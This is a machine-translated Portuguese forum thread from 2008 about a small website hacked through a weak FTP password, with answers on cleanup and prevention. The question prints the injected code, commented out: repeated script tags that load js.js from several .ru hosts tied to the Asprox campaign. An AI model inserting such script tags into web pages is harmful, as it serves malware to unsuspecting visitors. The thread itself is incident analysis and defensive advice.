Meu site foi hackeado .. O que devo fazer?

votos
18

Meu pai me ligou hoje e disse que as pessoas que vão para o seu site estavam recebendo 168 vírus que tentam fazer o download para seus computadores. Ele não é técnico em tudo, e construiu a coisa toda com um editor WYSIWYG.

Eu apareci seu site aberto e visto a fonte, e não havia uma linha de Javascript inclui na parte inferior da fonte direita antes de fechar a tag HTML. Eles incluíram esta imagem (entre muitos outros): http://www.98hs.ru/js.js <- desligar o JavaScript antes de ir para esse URL.

Então eu comentei-lo por agora. Acontece que a sua senha de FTP era uma palavra de dicionário simples seis letras, por isso acho que é assim que ficou cortada. Nós mudamos a senha para uma seqüência de caracteres não-palavra 8+ dígitos (ele não iria para uma frase secreta, pois ele é um typer caça-n-Peck).

Eu fiz um whois em 98hs.ru e encontrou ele está hospedado em um servidor no Chile. Há realmente um endereço de e-mail associado a ela também, mas eu duvido seriamente que esta pessoa é o culpado. Provavelmente apenas algum outro site que ficou cortada ...

Eu não tenho nenhuma idéia do que fazer neste momento embora como eu nunca lidei com esse tipo de coisa antes. Alguém tem alguma sugestão?

Ele estava usando plain jane un-secured ftp através webhost4life.com. Eu nem sequer ver uma maneira de fazer sftp em seu site. Estou pensando seu nome de usuário e senha foi interceptado?

Assim, para tornar isso mais relevantes para a comunidade, quais são os passos que deve tomar / melhores práticas que você deve seguir para proteger seu site de hackeadas?

Para o registro, aqui é a linha de código que magicamente foi adicionado ao seu arquivo (e não está em seu arquivo em seu computador - Eu deixei ele comentada apenas para fazer absoluta certeza de que ele não vai fazer nada nesta página, embora eu tenho certeza que Jeff iria proteger contra isso):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
Publicado 06/08/2008 em 00:55
fonte usuário
Em outras línguas...                            


8 respostas

votos
14

Eu sei que isto é um pouco tarde no jogo, mas o URL mencionado para o JavaScript é mencionado em uma lista de sites conhecidos por ter sido parte do ressurgimento bot Asprox que começou em junho (pelo menos é isso quando estávamos ficando sinalizado com isto). Alguns detalhes sobre ele são mencionados abaixo:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

A coisa desagradável sobre isso é que efetivamente todos os campos tipo varchar no banco de dados é "infectado" para cuspir uma referência a esta URL, em que o navegador recebe uma pequena iframe que o transforma em um robô. Uma correção SQL básico para isso pode ser encontrada aqui:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

O mais assustador é que embora o vírus olha para as tabelas do sistema para valores de infectar e um monte de planos de hospedagem compartilhada também compartilhar o espaço de banco de dados para seus clientes. Assim, o mais provável era local nem mesmo o seu pai de que estava infectado, mas local de outra pessoa dentro de seu conjunto de hospedagem que escreveu algum código pobre e abriu a porta para SQL ataque de injeção.

Se ele não tiver feito isso ainda, eu enviar um URGENTE e-mail para o seu anfitrião e dar-lhes um link para que o código SQL para corrigir todo o sistema. Você pode corrigir suas próprias tabelas de banco de dados afetados, mas muito provavelmente os bots que estão fazendo a infecção vai passar através daquele buraco novamente e infectar todo o lote.

Esperemos que este dá-lhe mais algumas informações para trabalhar.

EDIT: Mais um pensamento rápido, se ele está usando um dos anfitriões ferramentas de design online para a construção de seu site, todo esse conteúdo é provavelmente sentado em uma coluna e foi infectado dessa forma.

Respondeu 07/08/2008 em 23:49
fonte usuário

votos
13

Experimente e recolher o máximo de informação possível. Veja se o host pode dar-lhe um registo que mostra todas as conexões FTP que foram feitas à sua conta. Você pode usar aqueles para ver se era mesmo uma conexão FTP que foi usado para fazer a mudança e, possivelmente, obter um endereço IP.

Se você estiver usando um software pré-embalado como Wordpress, Drupal, ou qualquer outra coisa que você não codificar pode haver vulnerabilidades em código de upload que permite este tipo de modificação. Se é costume construído, verifique quaisquer lugares onde você permitem aos usuários fazer upload de arquivos ou modificar arquivos existentes.

A segunda coisa seria a de tomar um despejo do local em que se encontra e verificar tudo para outras modificações. Pode ser apenas uma única modificação que eles fizeram, mas se eles entraram em via FTP quem sabe o que mais está lá em cima.

Reverter o seu site de volta para um bom estado conhecido e, se necessário, atualizar para a versão mais recente.

Há um nível de retorno que você tem que levar em conta também. É o dano pena tentar rastrear a pessoa para baixo ou isso é algo que você acabou de viver e aprender e usar senhas fortes?

Respondeu 06/08/2008 em 01:16
fonte usuário

votos
5

Você menciona seu pai estava usando uma ferramenta de publicação website.

Se a ferramenta de publicação publica do seu computador para o servidor, ele pode ser o caso de que seus arquivos locais são limpos, e que ele só precisa republicar para o servidor.

Ele deve ver se há um método de login diferente para o servidor de FTP simples, embora ... isso não é muito seguro porque ele envia a sua senha como texto claro através da internet.

Respondeu 06/08/2008 em 04:31
fonte usuário

votos
3

Com uma senha de caracteres de seis palavra, ele pode ter sido ataque de força bruta. Isso é mais provável do que o seu ftp sendo interceptado, mas poderia ser isso também.

Comece com uma senha forte. (8 caracteres ainda é bastante fraca)

Veja se este link para um internet blog de segurança é útil.

Respondeu 06/08/2008 em 01:00
fonte usuário

votos
2

É o site apenas HTML simples estática? ou seja, ele não conseguiu codificar-se uma página de upload que permite a qualquer pessoa dirigindo por fazer upload de scripts comprometidos / páginas?

Por que não pedir webhost4life se eles têm alguma registros de FTP disponível e comunicar o problema para eles. Você nunca sabe, eles podem ser bastante receptivo e descobrir para você exatamente o que aconteceu?

Eu trabalho para um hoster compartilhada e nós sempre bem-vindos relatórios como estes e geralmente pode identificar o vetor exato de ataque com base e aconselhar a respeito de onde o cliente deu errado.

Respondeu 06/08/2008 em 01:24
fonte usuário

votos
0

Isso aconteceu com um cliente meu recentemente que estava alojado em ipower. Eu não tenho certeza se o seu ambiente de hospedagem foi baseado Apache, mas se fosse certifique-se de verificar novamente para arquivos .htaccess que você não criou, especialmente acima do webroot e dentro de diretórios de imagem, como eles tendem a injetar um pouco de maldade lá bem (eles estavam redirecionando as pessoas dependendo de onde vieram na REFER). Além disso, verifique qualquer um que você criou para o código que você não escreveu.

Respondeu 26/09/2008 em 21:21
fonte usuário

votos
0

Desligue o servidor web, sem desligá-lo para evitar scripts de desligamento. Analisar o disco rígido através de outro computador como uma unidade de dados e veja se você pode determinar o culpado através de arquivos de log e coisas dessa natureza. Verifique se o código é seguro e, em seguida, restaurá-lo a partir de um backup.

Respondeu 26/09/2008 em 21:12
fonte usuário

votos
-1

Nós tinha sido cortada a partir mesmos caras aparentemente! Ou bots, no nosso caso. Eles usaram injeção SQL no URL em alguns sites antigos ASP clássico que ninguém mantêm mais. Encontramos atacando IPs e bloqueou-los em IIS. Agora temos que refazer tudo velho ASP. Então, meu conselho é para dar uma olhada em IIS registra primeiro, para encontrar se o problema está na configuração do código ou o servidor do seu site.

Respondeu 16/08/2008 em 17:35
fonte usuário

Cookies help us deliver our services. By using our services, you agree to our use of cookies. Learn more